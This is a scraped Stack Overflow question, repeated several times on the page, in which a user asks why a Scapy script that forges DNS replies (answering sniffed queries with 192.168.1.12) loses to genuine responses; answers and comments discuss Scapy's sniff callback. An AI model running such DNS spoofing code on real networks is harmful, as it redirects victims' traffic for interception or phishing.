Fake DNS response












0















I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks



import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)









share|improve this question

























  • Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?

    – Patrick Mevzek
    Nov 13 '18 at 22:51
















0















I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks



import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)









share|improve this question

























  • Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?

    – Patrick Mevzek
    Nov 13 '18 at 22:51














0












0








0








I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks



import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)









share|improve this question
















I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks



import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)






python sockets dns response scapy






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Nov 12 '18 at 19:02







Liron

















asked Nov 12 '18 at 18:12









LironLiron

83




83













  • Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?

    – Patrick Mevzek
    Nov 13 '18 at 22:51



















  • Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?

    – Patrick Mevzek
    Nov 13 '18 at 22:51

















Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?

– Patrick Mevzek
Nov 13 '18 at 22:51





Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?

– Patrick Mevzek
Nov 13 '18 at 22:51












1 Answer
1






active

oldest

votes


















1














You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :



packets = sniff(filter="port 53" , prn=func , count=1) 
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it





share|improve this answer
























  • The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...

    – Patrick Mevzek
    Nov 13 '18 at 22:51











  • When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.

    – Ali Kargar
    Nov 14 '18 at 8:46











  • @AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performances.

    – Cukic0d
    Nov 20 '18 at 22:21











Your Answer






StackExchange.ifUsing("editor", function () {
StackExchange.using("externalEditor", function () {
StackExchange.using("snippets", function () {
StackExchange.snippets.init();
});
});
}, "code-snippets");

StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "1"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});














draft saved

draft discarded


















StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53267828%2ffake-dns-response%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









1














You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :



packets = sniff(filter="port 53" , prn=func , count=1) 
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it





share|improve this answer
























  • The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...

    – Patrick Mevzek
    Nov 13 '18 at 22:51











  • When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.

    – Ali Kargar
    Nov 14 '18 at 8:46











  • @AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performances.

    – Cukic0d
    Nov 20 '18 at 22:21
















1














You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :



packets = sniff(filter="port 53" , prn=func , count=1) 
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it





share|improve this answer
























  • The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...

    – Patrick Mevzek
    Nov 13 '18 at 22:51











  • When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.

    – Ali Kargar
    Nov 14 '18 at 8:46











  • @AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performances.

    – Cukic0d
    Nov 20 '18 at 22:21














1












1








1







You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :



packets = sniff(filter="port 53" , prn=func , count=1) 
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it





share|improve this answer













You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :



packets = sniff(filter="port 53" , prn=func , count=1) 
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it






share|improve this answer












share|improve this answer



share|improve this answer










answered Nov 13 '18 at 6:27









Ali KargarAli Kargar

1444




1444













  • The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...

    – Patrick Mevzek
    Nov 13 '18 at 22:51











  • When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.

    – Ali Kargar
    Nov 14 '18 at 8:46











  • @AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performances.

    – Cukic0d
    Nov 20 '18 at 22:21



















  • The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...

    – Patrick Mevzek
    Nov 13 '18 at 22:51











  • When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.

    – Ali Kargar
    Nov 14 '18 at 8:46











  • @AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performances.

    – Cukic0d
    Nov 20 '18 at 22:21

















The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...

– Patrick Mevzek
Nov 13 '18 at 22:51





The "manipulate your DNS packet here then forward it" is exactly what the code does in the while True, sendp is exactly the function that sends the packets...

– Patrick Mevzek
Nov 13 '18 at 22:51













When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.

– Ali Kargar
Nov 14 '18 at 8:46





When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.

– Ali Kargar
Nov 14 '18 at 8:46













@AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performances.

– Cukic0d
Nov 20 '18 at 22:21





@AliKargar that last comment of yours is wrong: the cases are very similar, except that using prn uses the same socket instance, and has improved performances.

– Cukic0d
Nov 20 '18 at 22:21


















draft saved

draft discarded




















































Thanks for contributing an answer to Stack Overflow!


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53267828%2ffake-dns-response%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







Popular posts from this blog

Full-time equivalent

さくらももこ

13 indicted, 8 arrested in Calif. drug cartel investigation